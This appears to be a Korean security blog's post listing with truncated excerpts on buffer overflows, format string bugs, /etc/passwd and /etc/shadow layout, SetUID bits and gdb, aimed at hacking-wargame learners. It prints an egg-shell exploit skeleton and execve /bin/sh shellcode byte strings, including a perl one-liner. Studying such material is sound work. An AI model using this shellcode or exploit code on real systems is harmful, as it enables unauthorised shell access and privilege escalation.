┏┳━┳┳━━┳━━━┳━━━┳━━━┳━┳━┳━┳━┳━━━┓┃┃ ┃┃ ┃ ━┫ ━┫ ┃ ┃ ┃ ┃ ┃ ━╋┓┃ ┃ ┃ ┃ ┃ ┏━┫ ┃ ┃ ┃┃ ┃ ┃ ┣━ ┃ ━┫ ┃ ┣┓ ┏╋━ ┃┃ ┣━━━┻━━┻━━━┻━━━┻━━━┻━━━┛┗━┛┗━━━┫┃┃Since 2002. W / I / S / E / G / U / Y / S in HackerSchool ┃┃┃http://wiseguys.hackerschool.org wiseguys@hackerschool.org ┃┃┗┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛┃ ┗━━━━━━━━━━━━━━━━━━━━Designed by FiaDot━┛ ━[Document Infomation] ━━━━━━━━━━━━━━━━━━━━━ :: Title :: 버퍼 오버..
#include #include #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\xc9\xcd\x80\x89\xc2\x31\xc0\xb0\x46\x31\xdb\x89\xd3\x31\xc9\x66\x89\xd9\xcd\x80\xeb\x50\x5e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xf1\xb2\x30\xcd\x80\x83\x06\x05\x83\x46\x01\x20\x83\x46\x02\x17\x83\x46\x03\x2d\x83\x6e\x0..
25byte shellcode`perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'` (%2f) 없는 shellcode \xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
[포맷스트링 취약점]정리 아래의 소스는 아스키 코드표를 출력하는 예제이다. 메모리에 저장된 값과 모니터를 통해 보는 것이 다르다는 것을 보기 위해서 설명을 해보겠다. value 배열에 정수값을 넣었지만 실제로 메모리에는 2진수 값이 들어 있다. 메모리나 하드디스크는 전기가 있고 없음만을 판단할 수 있어서 0과 1로만 데이터를 저장할 수 있기 때문이다. 즉, 화면으로 "a"라는 문자를 본다고 해서 메모리에 "a"라는 문자가 저장돼 있는 것은 아니고, 화면에서 "1"이라는 숫자가 표시된다고 해서 메모리에 "1"이라는 숫자가 저장돼 있지는 않다는 의미이다. 결과 값을 보면, 0부터 계속하여 126까지 Hex와 DEC와 OCT, CHAR을 출력한다. 0에서 31번까지에 해당하는 특수문자는 %c라는 포맷스트링을 ..
출처 : WOWHACKER 달고나님
[/etc/passwd 구조] 아이디패스워드 UserID GroupID 사용자명 홈 디렉터리 로그인쉘 level8x 3008 3008 Level 8 /home/level8 /bin/bash 자세히 봐야 할게 패스워드 부분이다. 원래 초기의 리눅스는 /etc/passwd 파일에 평문 형태로 패스워드를 표기했으나 패스워드를 아무나 보면 안 된다는 보안 의식이 생기면서 지금처럼 모든 계정이 읽을 수 있는 /etc/passwd에 있는 패스워드 부분은 x로 가려져 있고, 실제로 암호화한 패스워드는 root 계정만 읽을 수 있는 권한이 부여된 /etc/shadow에 저장이 된다. [/etc/shadow 구조] 열1 열2 열3 열4 열5 열6 열7 열8 열9 level8 $111$jdjdDD##@djdjdjd0 15..
SetUID와 SetGID는 유닉스 시스템에서 파일에 다른 계정과 그룹의 권한을 일시적으로 빌려주는 개념이다.그러므로 일반적인 읽기(R), 쓰기(W)와 실행(X) 권한과는 다른 독특한 개념이라 할 수 있다. 일반적인 rwx 권한은 해당 파일에 권한이 있는대로만 자신의 계정으로 읽거나 쓰거나 실행할 수 있는 형태로 접근할 수 있지만 SUID가 설정된 파일은 해당 파일을 실행하는 동안은 일시적으로 파일 소유자의 계정으로 잠시 바뀌게 된다. 명령어 SUID SGID 스티키 비트 chmod 4000 2000 1000 SUID 설정 -> rws-rwx-rwx SGID 설정 -> rwx-rws-rwx Sticky Bit 설정 -> rwx-rwx-rwt -> 디렉터리에 스티키 비트를 설정하는 방법에 대해서 알아보면,..
gdb는 Linux에서 사용되는 디버깅 툴 입니다. linux에서 이 툴을 이용해서 디버깅을 좀 더 수월하게 진행할 수 있습니다. 다음은 간단한 사용법입니다. 01. 우선 컴파일 시에 디버깅 옵션을 주어 컴파일 합니다. # g++ -g -o -g : 디버깅 옵션 (최적화 옵션인 -O는 주지 않는다) -o : 출력할 프로그램의 이름. 의 이름대로 프로그램이 만들어진다. 에 *.c 혹은 *.cpp와 같이 소스코드 파일명이 들어간다. 02. gdb를 사용합니다. gdb를 사용하는 방법은 크게 3가지로 있습니다. 1) # gdb ./ 2) # gdb ./ ./ 3) # gdb ./ ./ 가장 일반적으로 사용되는 것은 1번과 2번 입니다. 1,2번을 간단히 설명하자면. 1번 사용법은 gdb를 사용하여 프로그램을 ..
- Total
- Today
- Yesterday
- 위협정보공유
- 한글악성코드
- 스피어피싱
- Yara
- 출처 : Do it 안드로이드 프로그래밍
- AMSI
- Decoding
- 해킹메일
- keylogger
- Kimsuky
- Static Analysis Engine
- Servey
- vuln
- us-cert
- 멋쟁이사자처럼 4기
- 비트코인
- malware
- VirusBulletin
- koodous
- 악성코드
- Flybits
- infostealer
- Cisco Talos
- CVE-2018-9375
- .wll
- Bisonal
- idapython
- cuckoo-sandbox
- MS-Office
- CVE-2018-0798
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |